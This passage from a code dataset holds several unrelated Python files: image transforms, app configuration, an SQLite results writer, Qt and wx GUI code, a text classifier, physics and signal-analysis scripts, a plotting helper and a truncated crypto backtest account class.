cv2.getRotationMatrix2D((width/2,height/2),-15,1)\n\n# M already holds the cosine/sine of the rotation angle (M[0,0]=cos, M[0,1]=sin);\n# applying math.sin/math.cos to those entries again was a bug\nsin = M[0,1]\ncos = M[0,0]\nbound_w = int((height * abs(sin)) + (width * abs(cos)))\nbound_h = int((height * abs(cos)) + (width * abs(sin)))\n\nM[0, 2] += ((bound_w / 2) - width/2)\nM[1, 2] += ((bound_h / 2) - height/2)\n\nJ1 = cv2.warpAffine(I,M,(bound_w,bound_h))\n\nJ1=cropBorders(J1)\ncv2.imshow(\"License Plate Rotated\", J1)\n\n\ntform=np.float32([ [1,0.3,0],[0,1,0]])\n \n\nh,w=J1.shape[:2] #height and width values of the image\nJ2=np.zeros([h*2,w*2],dtype=np.uint8)\n\nJ2 = cv2.warpAffine(J1,tform,(w*2,h*2))\n\nJ2=cropBorders(J2)\ncv2.imshow(\"License Plate Skewed\", J2)\n\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n#**************cleaner and color version\n\nI=cv2.imread(\"LicensePlate.png\") #read image\ncv2.imshow(\"License Plate Original\", I)\n\nheight,width=I.shape[:2]\n\n# Rotate clockwise 15 degrees to align base\nM= cv2.getRotationMatrix2D((width/2,height/2),-15,1)\nJ1 = cv2.warpAffine(I,M,(width,height))\ncv2.imshow(\"License Plate Rotated\", J1)\n\n\n# Now apply a skew\ntform=np.float32([ [1,0.3,0],[0,1,0]])\nheight,width=J1.shape[:2] \nJ2=np.zeros([height,width],dtype=np.uint8)  # was [h,w], stale values left over from the first section\nJ2 = cv2.warpAffine(J1,tform,(width,height))\ncv2.imshow(\"License Plate Skewed\", J2)\n\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"Week 3/Page_17_Example.py","file_name":"Page_17_Example.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"532716982","text":"import os\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\ndb_path = os.path.join(basedir, '../db/dev_item_catelog.db')\n\nDEBUG = True\nPORT = 5000\nHOST = \"0.0.0.0\"\nSQLALCHEMY_ECHO = True\nSQLALCHEMY_TRACK_MODIFICATIONS = True\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + db_path\nSECRET_KEY = b'ce9679a787b3486299963861eff5738a'\n","sub_path":"config/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"138969446","text":"\n\"\"\"\nAuthor: Ryan Wilson\n\nNote: This is one of the most hacky, unorganized things I have ever written. 
This should only be temporary\n\n\"\"\"\nimport sqlite3 as sq\nimport sys\n\nclass handler():\n\n\t__slots__ = ( 'filename', 'contents', 'db', 'analysed', 'bad', 'preconditions' )\n\n\tdef __init__( self, filename=False ):\n\t\t\n\t\tif not filename:\n\t\t\tpass\n\t\telse:\n\t\t\tself.filename = filename\n\t\t\tself.parseFile( filename )\n\n\t\tself.db = sq.connect(\"analysis.db\")\n\t\tcursor = self.db.cursor()\n\n\n\tdef parseFile( self, filename ):\n\t\tfContents = \"\"\n\t\ttestData = {}\n\n\t\tfor line in open(filename):\n\t\t\tfContents += line\t\t\n\n\t\tcontent = fContents.split(\"SECTION=\")[1:]\n\n\t\td = dict()\n\n\t\tfor section in content:\n\t\t\ts = section.split(\"\\n\")\n\t\t\td[s[0]] = s[1:]\n\n\t\tself.contents = d\n\n\t\treturn self.contents\n\n\tdef handle( self ):\n\t\t\"\"\"\n\t\tDoes the job\n\n\t\tNeeds an if now\n\t\tHas to check if analysed first\n\t\t\"\"\"\n\t\ts = self.contents # redeclaration for typing's sake\n\n\t\t# Debugging\n\t\t# f = open('hi.txt', 'w+')\n\t\t# print(self.contents, file=f)\n\t\tanalysed = ''.join([x for x in s['analysed'] if x != ''])\n\n\t\tname = ','.join([x for x in s['segment_name'] if x != ''])\n\t\tfname = ','.join([x for x in s['file_name'] if x != ''])\n\t\tcode = ','.join([x for x in s['segment_code'] if x != ''])\n\t\txml = ','.join([x for x in s['xml'] if x != ''])\n\t\tblock = ','.join([x for x in s['block'] if x != ''])\n\t\terror = ','.join([x for x in s['error'] if x != ''])\n\t\tpreconditions = ','.join([x.replace('[1]', '', 1).replace('\"', '') for x in s['comparison'] if x != ''])\n\t\ttime = ','.join([x for x in s['time'] if x != ''])\n\t\ttestingtime = ','.join([x for x in s['testingTime'] if x != ''])\n\t\tgeneratetime = ','.join([x for x in s['generateTime'] if x != ''])\n\t\tlinecover = ','.join([x for x in s['lineCoverage'] if x != ''])\n\t\tbranchcover = ','.join([x for x in s['branchCoverage'] if x != ''])\n\n\n\t\tif analysed == 'true':\n\t\t\tsimple = ','.join([x for x in s['simple'] if x != ''])\n\t\t\ttran = \"\" # transformed section is empty for invariants\n\t\t\tbinary = \"\" # Binary section is empty for invariants?\n\t\t\tseg = ','.join([x for x in s['segmented'] if x != ''])\n\t\t\tbad = ','.join([x for x in s['bad'] if x != ''])\n\t\telse:\n\t\t\tsimple = 'N/A'\n\t\t\tself.contents['simple'] = ['N/A']\n\t\t\ttran = 'N/A'\n\t\t\tself.contents['transformed'] = ['N/A']\n\t\t\tbinary = 'N/A'\n\t\t\tself.contents['binary'] = ['N/A']\n\t\t\tseg = 'N/A'\n\t\t\tself.contents['segmented'] = ['N/A']\n\t\t\tbad = 'N/A'\n\t\t\tself.contents['bad'] = ['N/A']\n\n\t\tself.write(name, fname, simple, tran, binary, seg, bad, code, analysed, error, time, xml, block, \\\n\t\t\t\t preconditions, generatetime, testingtime, linecover, branchcover)\n\n\t\tself.analysed = analysed\n\t\tself.bad = bad\n\n\t\treturn s\n\n\tdef write( self, name, fname, simple, transformed, binary, segmented, bad, code, analysed, error, \\\n\t\t\t time, xml, block, preconditions, generatetime, testingtime, linecover, branchcover ):\n\t\t\"\"\"\n\t\tWrites the stuff to the database\n\n\t\tAdd new things\n\t\t\"\"\"\n\t\tcursor = self.db.cursor()\n\t\tcursor.execute(\"CREATE TABLE IF NOT EXISTS linearAnalysis(name text, fname text, simple text, transformed text, \\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t binary text, segmented text, bad text, code text, analysed text, \\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t error text, time text, xml text, block text, preconditions text, \\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t generatetime text, testingtime text, linecover 
text, branchcover text \\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t );\")\n\t\tself.db.commit()\n\t\tquery = \"INSERT INTO linearAnalysis (name, fname, simple, transformed, binary, segmented, bad, code, analysed, error, time, \\\n\t\t\t\t\t\t\t\t\t\t\t xml, block, preconditions, generatetime, testingtime, linecover, branchcover \\\n\t\t\t\t\t\t\t\t\t\t\t ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\" \n\t\tcursor.execute(query, [name, fname, simple, transformed, binary, segmented, bad, code, analysed, error, time, xml, block, \\\n\t\t\t\t\t\t\t preconditions, generatetime, testingtime, linecover, branchcover])\n\t\tself.db.commit()\n\t\tID = cursor.lastrowid\n\t\tcursor.close()\n\n\t\treturn ID\n\n\tdef hasResult( self ):\n\t\t\"\"\"\n\t\tReturns whether or not the analysis was able to do anything of VALUE\n\t\t\"\"\"\n\t\tsomething = True \n\n\t\tif self.analysed != 'true' or self.bad != 'N/A': # Could probably be improved\n\t\t\tsomething = False\n\n\t\treturn something\n\n\nif __name__ == \"__main__\":\n\t\n\toutput = sys.argv[1] # I think this index is correct, should be filepath to analysis results\n\t\n\th = handler(output)\n\th.handle()\n\n\tif h.hasResult():\n\t\tprint('\\n\\nAnalysis produced some result.\\n\\n') # empty lines are for visibility during execution\n\telse:\n\t\tprint(\"\")","sub_path":"src/edu/rit/bsg/helium/analysis/rypython/integrate.py","file_name":"integrate.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"213648686","text":"from __future__ import with_statement\n\nimport os\nimport sys\nimport operator\nimport time\nfrom PyQt4 import QtCore, QtGui, uic\nfrom PyQt4.QtCore import Qt\n\nimport mosaic.mdio.sqlite3MDIO as sqlite\nfrom mosaic.utilities.resource_path import resource_path, last_file_in_directory\nimport mosaicgui.sqlQueryWorker as sqlworker\n\nclass FileViewWindow(QtGui.QDialog):\n\tdef __init__(self, parent = None):\n\t\tsuper(FileViewWindow, self).__init__(parent)\n\n\t\t# uic.loadUi(os.path.join(os.path.dirname(os.path.abspath(__file__)),\"statisticsview.ui\"), self)\n\t\tuic.loadUi(resource_path(\"fileview.ui\"), self)\n\t\t\n\t\tself._positionWindow()\n\n\t\tself.idleTimer=QtCore.QTimer()\n\t\tself.idleTimer.start(3000)\n\t\n\t\tself.queryString=\"select filename, fileformat, modifiedtime from processedfiles\"\n\t\tself.queryData=[]\n\n\t\tself.tableModel = FileViewModel(self, [['N/A','N/A','N/A']], ['File Name', 'File Type', 'Last Modified'])\n\t\tself.fileTableView.setModel(self.tableModel)\n\n\t\tself.qWorker=None\n\t\tself.qThread=QtCore.QThread()\n\n\tdef openDB(self, dbpath):\n\t\t\"\"\"\n\t\t\tOpen the latest sqlite file in a directory\n\t\t\"\"\"\n\t\tself.openDBFile( last_file_in_directory(dbpath, \"*sqlite\") )\n\n\tdef openDBFile(self, dbfile):\n\t\t\"\"\"\n\t\t\tOpen a specific database file.\n\t\t\"\"\"\n\t\tself.qWorker=sqlworker.sqlQueryWorker(dbfile)\n\t\n\t\t# Connect signals and slots\n\t\tself.qWorker.resultsReady.connect(self.OnDataReady)\n\n\t\tself.qWorker.moveToThread(self.qThread)\t\n\t\tself.qWorker.finished.connect(self.qThread.quit)\n\t\tself.qThread.start()\n\n\t\t# Query the DB\n\t\tself._updatequery()\n\n\t\t# Idle processing\n\t\tQtCore.QObject.connect(self.idleTimer, QtCore.SIGNAL('timeout()'), self.OnAppIdle)\n\n\tdef closeDB(self):\n\t\tpass\n\n\tdef _positionWindow(self):\n\t\t\"\"\"\n\t\t\tPosition settings window at the top left corner\n\t\t\"\"\"\n\t\tif 
sys.platform=='win32':\n\t\t\tself.setGeometry(405, 555, 640, 200)\n\t\telse:\n\t\t\tself.setGeometry(405, 585, 640, 200)\n\n\tdef _updatequery(self):\n\t\tself.qThread.start()\n\t\tQtCore.QMetaObject.invokeMethod(self.qWorker, 'executeSQL', Qt.QueuedConnection, QtCore.Q_ARG(str, self.queryString) )\n\t\tself.queryRunning=True\n\n\tdef OnDataReady(self, res, errorstr):\n\t\tif not errorstr:\n\t\t\ttry:\n\t\t\t\tif len(res) > 0:\n\t\t\t\t\tself.queryData=[ [os.path.basename(r[0]), r[1], time.ctime(float(r[2])) ] for r in res]\n\n\t\t\t\t\t# self.tableModel = FileViewModel(self, self.queryData, ['File Name', 'File Type', 'Last Modified'])\n\t\t\t\t\tself.tableModel.update(self.queryData)\n\t\t\t\t\t# self.fileTableView.setModel(self.tableModel)\n\n\t\t\t\t\tself.fileTableView.resizeColumnsToContents()\n\t\t\texcept:\n\t\t\t\traise\n\t\t\t\t\n\t\tself.queryRunning=False\n\n\tdef OnAppIdle(self):\n\t\tif not self.queryRunning:\n\t\t\tself._updatequery()\n\nclass FileViewModel(QtCore.QAbstractTableModel):\n\tdef __init__(self, parent, data, header, *args):\n\t\tQtCore.QAbstractTableModel.__init__(self, parent, *args)\n\n\t\t# store rows under a private name: an instance attribute called 'data' would shadow the data() method Qt invokes\n\t\tself._data=data\n\t\tself.header=header\n\n\tdef rowCount(self, parent):\n\t\treturn len(self._data)\n\n\tdef columnCount(self, parent):\n\t\treturn len(self._data[0])\n\n\tdef data(self, index, role):\n\t\tif not index.isValid():\n\t\t\treturn None\n\t\telif role != QtCore.Qt.DisplayRole:\n\t\t\treturn None\n\t\treturn self._data[index.row()][index.column()]\n\n\tdef headerData(self, col, orientation, role):\n\t\tif orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:\n\t\t\treturn self.header[col]\n\n\t\treturn None\n\n\tdef sort(self, col, order):\n\t\tself.emit(QtCore.SIGNAL(\"layoutAboutToBeChanged()\"))\n\t\tself._data = sorted(self._data, key=operator.itemgetter(col))\n\n\t\tif order == QtCore.Qt.DescendingOrder:\n\t\t\tself._data.reverse()\n\t\t\n\t\tself.emit(QtCore.SIGNAL(\"layoutChanged()\"))\n\n\tdef update(self, data):\n\t\tself._data=data\n\t\tself.emit(QtCore.SIGNAL(\"layoutChanged()\"))\n\nif __name__ == '__main__':\n\tdbfile=resource_path('eventMD-PEG29-Reference.sqlite')\n\n\tapp = QtGui.QApplication(sys.argv)\n\tdmw = FileViewWindow()\n\tdmw.openDBFile(dbfile)\n\tdmw.show()\n\tdmw.raise_()\n\tsys.exit(app.exec_())\n\n","sub_path":"mosaicgui/fileview/fileview.py","file_name":"fileview.py","file_ext":"py","file_size_in_byte":3833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"360010785","text":"import Vector\nimport PrincipleStress\nimport Stress\nimport wx\n\n# Example for stress input format: -19,-4.7,6.45/-4.7,4.6,11.8/6.45,11.8,-8.3\n# Example for vector input format: 1,4,2\n\n# List of the possible choices\nchoices = ['Vector Transformation', 'Stress Transformation', 'Principle Stress']\n\n\n# Function to show dialog with selectable items\ndef choose(title='AEE 361 Project', label='Choose which transformation to make'):\n modal = wx.SingleChoiceDialog(None, label, title, choices)\n\n if modal.ShowModal() == wx.ID_OK:\n result = modal.GetStringSelection()\n else:\n result = \"cancelled\"\n modal.Destroy()\n return result\n\n\n# Initialize the dialog interface\napp = wx.App()\napp.MainLoop()\n\n# show the choices dialog\nchoice = choose()\n\n# release the interface\napp.ExitMainLoop()\n\n# check for the choice\nif choice == choices[0]:\n Vector.vector_main_()\nelif choice == choices[1]:\n Stress.stress_main_()\nelif choice == choices[2]:\n 
PrincipleStress.principle_stress_main()\n","sub_path":"ProjectMain.py","file_name":"ProjectMain.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"235406615","text":"# import libraries\nimport sys\nimport numpy as np\nimport pandas as pd\n\nimport nltk\n\nnltk.download([\"punkt\", \"wordnet\", \"averaged_perceptron_tagger\"])\n\n\nfrom sqlalchemy import create_engine\nfrom nltk import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\nimport re\n\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import LinearSVC\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.metrics import classification_report\nimport pickle\n\n\ndef load_data(database_filepath):\n \"\"\" load data from database and define feature and target variables X and Y\"\"\"\n\n # create engine to get connection\n engine = create_engine(\"sqlite:///{}\".format(database_filepath))\n with engine.connect() as connection:\n df = pd.read_sql_table(\"appen\", connection)\n # define the features and output of the model\n X = df[\"message\"]\n Y = df.drop([\"message\", \"id\", \"original\", \"genre\"], axis=1)\n category_names = list(Y.columns)\n\n return X, Y, category_names\n\n\n# Tokenize function\ndef tokenize(text):\n \"\"\"Perform tokenization and lemmatization on the input text.\n\n Args: \n \n text -> string\n\n Returns:\n\n Array of strings containing a tokenized and lemmatizated version of the input string without\n characters that are not alphanumeric.\n\n \"\"\"\n text = re.sub(r\"[^a-zA-Z0-9]+\", \" \", text.lower())\n\n tokens = word_tokenize(text)\n lemmatizer = WordNetLemmatizer()\n\n clean_tokens = []\n for tok in tokens:\n clean_tok = lemmatizer.lemmatize(tok).lower().strip()\n clean_tokens.append(clean_tok)\n\n return clean_tokens\n\n\ndef build_model():\n \"\"\" Build pipeline that transforms a count matrix to a normalized tf or tf-idf representation\n and use linearSVC to classify the input.\"\"\"\n pipeline = Pipeline(\n [\n (\"vect\", CountVectorizer(tokenizer=tokenize)),\n (\"tfidf\", TfidfTransformer()),\n (\"clf\", MultiOutputClassifier(LinearSVC(dual=False))),\n ]\n )\n\n # use grid search to optimize the pipeline parameters\n parameters = {\"tfidf__use_idf\": (True, False), \"clf__estimator__C\": [1, 100]}\n cv = GridSearchCV(pipeline, param_grid=parameters)\n\n return cv\n\n\ndef evaluate_model(model, X_test, Y_test, category_names):\n \"\"\"evaluates by precision, recall, f1-score using classification_report\"\"\"\n y_pred_grid = model.predict(X_test)\n print(\n classification_report(Y_test.values, y_pred_grid, target_names=category_names)\n )\n\n\ndef save_model(model, model_filepath):\n \"\"\" Export model as a pickle file\"\"\"\n pickle.dump(model, open(model_filepath, \"wb\"))\n\n\ndef main():\n if len(sys.argv) == 3:\n database_filepath, model_filepath = sys.argv[1:]\n print(\"Loading data...\\n DATABASE: {}\".format(database_filepath))\n X, Y, category_names = load_data(database_filepath)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)\n\n print(\"Building model...\")\n model = build_model()\n\n print(\"Training model...\")\n model.fit(X_train, Y_train)\n\n print(\"Evaluating model...\")\n evaluate_model(model, X_test, Y_test, category_names)\n\n print(\"Saving 
model...\\n MODEL: {}\".format(model_filepath))\n save_model(model, model_filepath)\n\n print(\"Trained model saved!\")\n\n else:\n print(\n \"Please provide the filepath of the disaster messages database \"\n \"as the first argument and the filepath of the pickle file to \"\n \"save the model to as the second argument. \\n\\nExample: python \"\n \"train_classifier.py ../data/DisasterResponse.db classifier.pkl\"\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"573477838","text":"#!/usr/bin/env python\n\n'''\ncce analysis module\n'''\n\n__author__ = \"YANG TAO \"\n__copyright__ = \"Copyright (c) yangtao\"\n__created__ = \"[2018-03-09 Fri 19:00]\"\n\nimport sys,os,re\nimport numpy as np\nimport ROOT\nimport logging\n\nclass cceanalysis():\n\n def __init__(self):\n self.emit_particle_energy =5.89 #keV\n self.emit_particle_number = 10000\n self.mean_ionization_energy = 3.6 #ev\n self.gain = 8\n self.adc_threshold = 0.\n self.adc_slope = 3.8\n self.max_cluster_size = 4\n\n self.fname = None\n self.logname = None\n self.logger = None\n self.practical_adc_deposition = None\n self.receive_particle_number = None\n self.cce = None\n\n def __del__(self):\n pass\n\n def calculate_cce(self,receive_particle_number,practical_adc_deposition):\n ideal_adc_deposition = (receive_particle_number*self.gain*self.emit_particle_energy*1000/self.mean_ionization_energy)/self.adc_slope\n cce = practical_adc_deposition/ideal_adc_deposition\n return cce,ideal_adc_deposition\n\n def get_logger(self):\n logging.basicConfig(level=logging.DEBUG)\n logger = logging.getLogger(self.fname)\n self.file_handler = logging.FileHandler('./ccelog/'+self.logname+'_cce.log')\n self.file_handler.setLevel(logging.DEBUG)\n self.file_handler.setFormatter(logging.Formatter(' %(asctime)s - %(levelname)s- %(message)s'))\n logger.addHandler(self.file_handler)\n return logger\n\n\n\n def loginfo(self,logger):\n logger.info(' file name = %s'%self.fname)\n logger.info(' emit particle energy = %.2f keV'%self.emit_particle_energy)\n logger.info(' mean ionization energy = %s eV'%str(self.mean_ionization_energy))\n logger.info(' gain = %s'%str(self.gain))\n logger.info(' adc threshold = %s'%str(self.adc_threshold))\n logger.info(' adc slope = %s'%str(self.adc_slope)+ 'e')\n logger.info(' emit particle number = %s'%str(self.emit_particle_number))\n logger.info(' receive particle number = %s'%str(self.receive_particle_number[0]))\n logger.info(' ideal adc deposition = %s'%str(int(self.ideal_adc_deposition[0])))\n logger.info(' practical adc deposition = %s'%str(self.practical_adc_deposition[0]))\n logger.info(' charge collection efficiency = %.2f\\n'%self.cce[0])\n\n for icluster in xrange(1,self.max_cluster_size+1):\n logger.info(' cluster%d receive particle number = %s'%(icluster,str(self.receive_particle_number[icluster])))\n logger.info(' cluster%d ideal adc deposition = %s'%(icluster,str(int(self.ideal_adc_deposition[icluster]))))\n logger.info(' cluster%d practical adc deposition = %s'%(icluster,str(self.practical_adc_deposition[icluster])))\n logger.info(' cluster%d charge collection efficiency = %.2f\\n'%(icluster,self.cce[icluster]))\n\n logger.removeHandler(self.file_handler)\n\n\n def analyze(self,fname):\n\n self.fname = fname\n\n if not os.path.exists('./ccelog/'):\n os.makedirs('./ccelog/')\n logregex = 
re.compile('(./output/)(.*)(.root)')\n logmo = logregex.match(self.fname)\n self.logname = logmo.group(2)\n self.logger = self.get_logger()\n\n self.practical_adc_deposition = np.zeros(self.max_cluster_size+1)\n self.receive_particle_number = np.zeros(self.max_cluster_size+1,dtype=int)\n\n try:\n f = ROOT.TFile(self.fname)\n t = f.Get('clusters')\n entries = t.GetEntries()\n except:\n self.logger.error(self.fname+' is invalid!')  # bare 'logger' was undefined here and raised NameError\n sys.exit()\n\n for ientry in xrange(entries):\n t.GetEntry(ientry)\n size = t.size\n adc = 0\n\n if size <= self.max_cluster_size:\n for ipos in xrange(size):\n adc += t.signal.at(ipos) \n if adc>self.adc_threshold:\n self.receive_particle_number[0] += 1\n self.receive_particle_number[size] += 1\n self.practical_adc_deposition[0] += adc\n self.practical_adc_deposition[size] +=adc\n\n else:\n continue\n\n self.cce,self.ideal_adc_deposition = self.calculate_cce(self.receive_particle_number,self.practical_adc_deposition)\n\n print('\\n********************%s*********************\\n'%self.fname)\n\n self.loginfo(self.logger)\n\n return self.cce,self.receive_particle_number\n\n\nif __name__ == '__main__':\n e = cceanalysis()\n e.analyze('./output/data_with_electricfield_genapx.root')\n e.analyze('./output/data_without_electricfield_genapx.root')","sub_path":"jadepix1/python/cceanalysis.py","file_name":"cceanalysis.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"633512626","text":"# Django settings for autodata project.\n\nDEBUG = True\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n }\n}\n\nMIDDLEWARE = (\n 'httpxforwardedfor.middleware.HttpXForwardedForMiddleware',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'mq%31q+sjj^)m^tvy(klwqw6ksv7du2yzdf9yn78iga*r%8w^t-httpxforwardedfor'\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'httpxforwardedfor',\n 'testapp',\n)\n\nSTATIC_URL = '/static/'\n\n# Only allow HTTP_X_FORWARDED_FOR, if the request is marked as secure.\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\n# To only allow change of the REMOTE_ADDR for requests via HTTPS.\n# The default is to allow all requests.\nTRUST_ONLY_HTTPS_PROXY = True\n\nROOT_URLCONF = \"tests.testapp.urls\"\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"455437937","text":"import os\n\nimport numpy as np\n\n\ndef spotted_lc():\n \"\"\"\n Returns\n -------\n data: ndarray\n KIC 9655172 light curve, used for testing and demonstration.\n\n Examples\n --------\n >>> import periodicity.data\n >>> t, y, dy = periodicity.data.spotted_lc()\n >>> y.shape == (2148,)\n True\n \"\"\"\n filename = os.path.join(os.path.dirname(__file__), \"spotted_lc.npy\")\n data = np.load(filename)\n return data\n\n\ndef bpsk(t_bit, n_bits, f_c, n0_db=-np.inf):\n \"\"\"\n Parameters\n ----------\n t_bit: int\n Number of samples per bit (sampling rate / bit rate).\n n_bits: int\n Desired number of bits in the generated signal.\n f_c: scalar\n Carrier frequency (normalized units).\n n0_db: scalar, optional\n Noise spectral density (average noise power). 
Defaults to -inf (zero noise).\n\n Returns\n -------\n data: ndarray\n Noisy BPSK signal, used for testing and demonstration.\n\n Examples\n --------\n >>> import periodicity.data\n >>> t, y = periodicity.data.bpsk(t_bit=10, n_bits=4000, f_c=0.05)\n >>> y.shape == (40_000,)\n True\n \"\"\"\n t0 = t_bit * n_bits\n sym_seq = np.zeros(t0)\n sym_seq[::t_bit] = np.random.choice([-1, 1], n_bits)\n pulse = np.ones(t_bit)\n baseband = np.convolve(pulse, sym_seq)[:t0]\n signal = baseband * np.exp(1j * 2 * np.pi * f_c * np.arange(t0))\n noise = np.random.randn(t0) + 1j * np.random.randn(t0)\n n0 = 10 ** (n0_db / 10)\n noise *= np.sqrt(n0 / np.var(noise))\n data = signal + noise\n return data\n","sub_path":"periodicity/data/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"360010785","text":"\"\"\"\nAuthor: Ziwei JIANG\nDate:2016/9/1\nVersion:1.0\nDiscription:\n\"\"\"\n\nimport csv\nimport matplotlib.pyplot as plt\nplt.rcdefaults()\nimport numpy as np\nfrom matplotlib.pyplot import savefig\n\ndef box_flier(data, parameters, output):\n\n # data\n all_data=[]\n pos=[]\n with open(data) as f:\n f_csv=csv.reader(f)\n header=next(f_csv)\n count=len(header)\n pos=header[1:]\n for row in f_csv:\n all_data.append(map(float,row[1:count]))\n all_data=map(list,zip(*all_data))\n\n # parameters\n figsize=(8,5)\n param=\" \"\n boxprops=dict(linestyle='--',linewidth='2',color='black')\n flierprops = dict(marker='o', markerfacecolor='green', markersize=12,linestyle='None',markeredgecolor='c')\n\n if 'figsize' in parameters.keys():\n figsize = eval(parameters['figsize'])\n fig = plt.figure(facecolor='w', figsize=figsize)\n if 'xlabel' in parameters.keys():\n plt.xlabel(parameters['xlabel'])\n if 'title' in parameters.keys():\n plt.title(parameters['title'])\n if 'ylabel' in parameters.keys():\n plt.ylabel(parameters['ylabel'])\n if 'whis' in parameters.keys():\n param=param+',whis='+str(parameters['whis'])\n if 'widths' in parameters.keys():\n param=param+',widths='+str(parameters['widths'])\n if 'showmeans' in parameters.keys():\n param=param+',showmeans='+str(parameters['showmeans'])\n if 'showcaps' in parameters.keys():\n param=param+',showcaps='+str(parameters['showcaps'])\n if 'vert' in parameters.keys():\n param=param+',vert='+str(parameters['vert'])\n if 'flier_marker' in parameters.keys():\n flierprops['marker']=parameters['flier_marker']\n if 'flier_markerfacecolor' in parameters.keys():\n flierprops['markerfacecolor']=parameters['flier_markerfacecolor']\n if 'flier_markeredgecolor' in parameters.keys():\n flierprops['markeredgecolor']=parameters['flier_markeredgecolor']\n if 'flier_markersize' in parameters.keys():\n flierprops['markersize']=parameters['flier_markersize']\n if 'flier_linestyle' in parameters.keys():\n flierprops['linestyle']=parameters['flier_linestyle']\n if 'box_linestyle' in parameters.keys():\n boxprops['linestyle']=parameters['box_linestyle']\n if 'box_linewidth' in parameters.keys():\n boxprops['linewidth']=parameters['box_linewidth']\n if 'box_color' in parameters.keys():\n boxprops['color']=parameters['box_color']\n param=param+',flierprops='+str(flierprops)\n param=param+',boxprops='+str(boxprops)\n\n # plot violin plot\n exec(\"bplot=plt.boxplot(all_data,showfliers='True'\"+param+\")\")\n # adding horizontal grid lines\n plt.grid(True,linestyle='--',linewidth=0.5)\n\n # add x-tick labels\n plt.xticks(np.arange(len(all_data))+1,pos)\n\n 
savefig(output,format='svg')\n","sub_path":"charts/python/matplotlib/box_flier.py","file_name":"box_flier.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"488675988","text":"# -*- coding:utf-8 -*-\n# -*- coding:utf-8 -*-\n# -*- coding:utf-8 -*-\n__author__ = 'xin'\n\n\"\"\"\n此文件是创建虚拟账户 \n\"\"\"\nfrom Data.dataMain_Fund_version import HistoryData\nimport talib\nimport numpy as np\nfrom collections import OrderedDict\nimport datetime\nfrom Strategy.strategy1_Fund_version_v2 import Demo\nimport copy\nfrom Setting.setting import start_date, end_date, init_dict, symbol_history_list, STRATEGY_NAME\n\n\n\nclass Order(object):\n def __init__(self, symbol, amount, time=None, type='market', price=0.):\n self.order_time = '' # 指令下达时间 datetime\n self.symbol = symbol # 交易标的\n self.type = type # 下单类型\n self.price = price # 价格\n self.amount = amount # 指令交易数量\n\n pass\n\n\nclass Account(object):\n # 初始化设置\n def __init__(self, init_dict, ):\n self.init_dict = init_dict\n self.symbol = ['BTC/USDT'] # symbol list\n self.cash = init_dict # 初始金额\n self.balance = init_dict # 账户余额\n self.free_cash = init_dict # 可使用资金\n self.free_cash_list = []\n self.used_cash = {} # 已用资金 使用的保证金\n self.used_cash_list = []\n self.allowClose_symbol = {} # 可卖标的\n self.trade_date = [] # 交易日日期\n self.back_test_date = [] # 回测日期\n self.every_balance = [] # 每日净值\n self.openFlag = True # 是否可以开仓标记\n self.closeFlag = False # 是否可以平仓\n self.limit_openFlag = True\n self.limit_closeFlag = False\n self.Order = Order # 下单模块\n self.blotter = [] # 下单列表\n\n self.open_fee = 0.001 # 开仓手续费\n self.close_fee = 0.001 # 平仓手续费\n\n self.csv_time_list = []\n self.csv_balance_list = []\n self.csv_openPrice_dict = OrderedDict() # 记录建仓价格\n self.csv_closePrice_dict = OrderedDict() # 记录平仓价格\n self.csv_dataPrice_dict = OrderedDict() # 记录货币价格\n\n for i in init_dict:\n self.used_cash[i] = 0.0 # 初始化\n\n\n pass\n\n def get_history(self, symbol, start, end, freq):\n \"\"\"\n 获取历史数据\n :param symbol: 交易标的\n :param start: 起始时间\n :param end: 结束时间\n :param freq: 时间周期\n :return: { symbol : {closePrice:[ , , ,],\n openPrice:[ , , ,],\n 